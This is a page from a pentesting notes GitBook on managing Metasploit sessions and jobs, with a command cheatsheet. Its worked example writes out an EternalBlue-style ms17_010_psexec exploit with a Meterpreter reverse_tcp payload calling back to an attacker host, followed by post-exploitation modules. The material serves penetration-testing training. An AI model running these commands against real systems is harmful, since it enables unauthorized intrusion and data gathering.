Noirchapeau's Gitbook
Noirchapeau
NoirchapeauEsau
Noirchapeau
NoirchapeauEsau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Overview
  • Sessions in Metasploit
  • Working with Sessions
  • Jobs in Metasploit
  • Working with Jobs
  • Using Sessions and Jobs Together
  • Practical Example: Meterpreter Session
  • Best Practices
  • Command Cheatsheet
  1. Metasploit

Sessions and Jobs

Overview

Sessions and jobs in Metasploit enable penetration testers to manage multiple ongoing tasks, maintain access to exploited systems, and organize their workflows. This chapter focuses on understanding, creating, and managing sessions and jobs effectively.

Sessions in Metasploit

A session is an active connection between the attacker and the target system, established after a successful exploit. Sessions allow interaction with compromised systems through Meterpreter shells, command-line interfaces, or other payload connections.

Working with Sessions

  1. List Active Sessions:

    • View all open sessions:

      sessions

  2. Interact with a Session:

    • Switch to a specific session:

      sessions -i <session_id>

  3. Background a Session:

    • Send an active session to the background:

      background

    • Alternatively, use Ctrl+Z to background a session.

  4. Terminate a Session:

    • End a specific session:

      sessions -k <session_id>

    • Kill all active sessions:

      sessions -K

  5. View Session Information:

    • Display details about a specific session:

      sessions -i <session_id>
info

Jobs in Metasploit

A job is a background task running in Metasploit. Jobs are often used for long-running tasks, such as exploit handlers or auxiliary modules like scanners.

Working with Jobs

  1. List Active Jobs:

    • Display all running jobs:

      jobs

  2. Stop a Job:

    • Terminate a specific job:

      jobs -k <job_id>

    • Kill all active jobs:

      jobs -K

  3. Run a Module as a Job:

    • Execute an exploit or auxiliary module in the background:

      exploit -j

  4. View Job Information:

    • Display detailed information about a job:

      jobs -v

Using Sessions and Jobs Together

  1. Exploit and Maintain Access:

    • Run an exploit in the background while monitoring active sessions:

      exploit -j
sessions

  2. Link Modules to a Session:

    • Use post-exploitation modules on an existing session:

      use post/windows/gather/enum_logged_on_users
set SESSION <session_id>
run

  3. Switch Between Sessions:

    • Interact with multiple compromised systems by switching between sessions:

      sessions -i <session_id>

  4. Convert a Session to a Job:

    • Background a session to free up the console for other tasks:

      background

Practical Example: Meterpreter Session

  1. Create a Session:

    • Use an exploit to gain access:

      use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_tcp
set RHOSTS <target_ip>
set LHOST <attacker_ip>
exploit

  2. Interact with the Session:

    • Check active sessions:

      sessions

    • Interact with the session:

      sessions -i 1

  3. Background the Session:

    background

  4. Run a Post-Exploitation Module:

    • Gather system information from the target:

      use post/windows/gather/system_info
set SESSION 1
run

Best Practices

  1. Organize Sessions and Jobs:

    • Regularly list and terminate unused sessions and jobs to avoid conflicts.

  2. Track Active Sessions:

    • Use meaningful notes or labels to identify each session (e.g., IP or hostname).

  3. Monitor Resource Usage:

    • Avoid running too many concurrent jobs or sessions to prevent performance issues.

  4. Background Long-Running Tasks:

    • Always background tasks like handlers or scanners to free up the console.

Command Cheatsheet

Command
Description

sessions

List all active sessions.

sessions -i <id>

Interact with a specific session.

sessions -k <id>

Terminate a specific session.

sessions -K

Kill all active sessions.

jobs

List all running jobs.

jobs -k <id>

Terminate a specific job.

jobs -K

Kill all active jobs.

exploit -j

Run an exploit as a background job.

background

Background the current session.

PreviousDatabase Management in MetasploitNextWriting and Importing Custom Modules into Metasploit